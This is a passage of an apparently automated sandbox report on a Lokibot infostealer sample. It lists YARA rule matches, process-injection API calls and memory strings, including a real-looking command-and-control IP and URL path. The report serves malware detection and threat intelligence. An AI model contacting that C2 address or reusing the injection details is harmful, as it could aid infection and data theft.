6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
Source: XCN5xgaiac.exe, 00000002.00000002.1711487587.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.65.182/
Source: XCN5xgaiac.exe, 00000002.00000002.1711061495.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, XCN5xgaiac.exe, 00000002.00000002.1711356037.0000000000F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.156.65.182/tomthf/cvghx/five/fre.php
Source: XCN5xgaiac.exe, XCN5xgaiac.exe, 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/

System Summary

barindex
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1685515472.00000000026A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: XCN5xgaiac.exe PID: 7308, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XCN5xgaiac.exe PID: 7392, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: XCN5xgaiac.exe Static PE information: section name: XIY6$
Source: XCN5xgaiac.exe Static PE information: section name:
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BB100 NtWriteVirtualMemory, 0_2_092BB100
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BB2A8 NtSetContextThread, 0_2_092BB2A8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BAD28 NtReadVirtualMemory, 0_2_092BAD28
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BAEE0 NtResumeThread, 0_2_092BAEE0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BB0F8 NtWriteVirtualMemory, 0_2_092BB0F8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BB2A1 NtSetContextThread, 0_2_092BB2A1
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BAD20 NtReadVirtualMemory, 0_2_092BAD20
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BAEDF NtResumeThread, 0_2_092BAEDF
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A80848 0_2_00A80848
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A84589 0_2_00A84589
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A88EE0 0_2_00A88EE0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8C6D8 0_2_00A8C6D8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A81665 0_2_00A81665
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8A388 0_2_00A8A388
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A83B90 0_2_00A83B90
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A853D8 0_2_00A853D8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A82719 0_2_00A82719
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A80838 0_2_00A80838
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8E850 0_2_00A8E850
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A87129 0_2_00A87129
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A87908 0_2_00A87908
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8ED18 0_2_00A8ED18
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A862A0 0_2_00A862A0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8EAA0 0_2_00A8EAA0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A89289 0_2_00A89289
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A81692 0_2_00A81692
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A86292 0_2_00A86292
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A876E0 0_2_00A876E0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A88ED0 0_2_00A88ED0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A876D2 0_2_00A876D2
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A86E40 0_2_00A86E40
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A86E50 0_2_00A86E50
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A85311 0_2_00A85311
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00A8536D 0_2_00A8536D
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AAE338 0_2_00AAE338
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AA29F8 0_2_00AA29F8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AA7B88 0_2_00AA7B88
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AA5CC8 0_2_00AA5CC8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AADCC0 0_2_00AADCC0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AAF1A8 0_2_00AAF1A8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AAC108 0_2_00AAC108
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AAC398 0_2_00AAC398
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AAB838 0_2_00AAB838
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AA29F1 0_2_00AA29F1
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_00AABEE8 0_2_00AABEE8
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BA0C0 0_2_092BA0C0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B1BD3 0_2_092B1BD3
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BE490 0_2_092BE490
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B5E68 0_2_092B5E68
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BCED0 0_2_092BCED0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BB858 0_2_092BB858
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BA0B5 0_2_092BA0B5
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B0430 0_2_092B0430
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B0440 0_2_092B0440
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BE481 0_2_092BE481
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B8F32 0_2_092B8F32
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092B8F40 0_2_092B8F40
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 0_2_092BCEC0 0_2_092BCEC0
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 4_2_0040549C 4_2_0040549C
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: 4_2_004029D4 4_2_004029D4
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\XCN5xgaiac.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7368 -s 80
Source: XCN5xgaiac.exe, 00000000.00000002.1684519715.00000000007FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs XCN5xgaiac.exe
Source: XCN5xgaiac.exe, 00000000.00000000.1664913562.00000000001D0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameserver1.exe6 vs XCN5xgaiac.exe
Source: XCN5xgaiac.exe, 00000000.00000002.1689863390.000000000D73D000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameserver1.exe6 vs XCN5xgaiac.exe
Source: XCN5xgaiac.exe Binary or memory string: OriginalFilenameserver1.exe6 vs XCN5xgaiac.exe
Source: XCN5xgaiac.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.XCN5xgaiac.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.XCN5xgaiac.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.XCN5xgaiac.exe.4119e48.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.XCN5xgaiac.exe.4119e48.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1673735103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1685515472.000000000268C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1685515472.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1686996125.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1685515472.00000000026C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
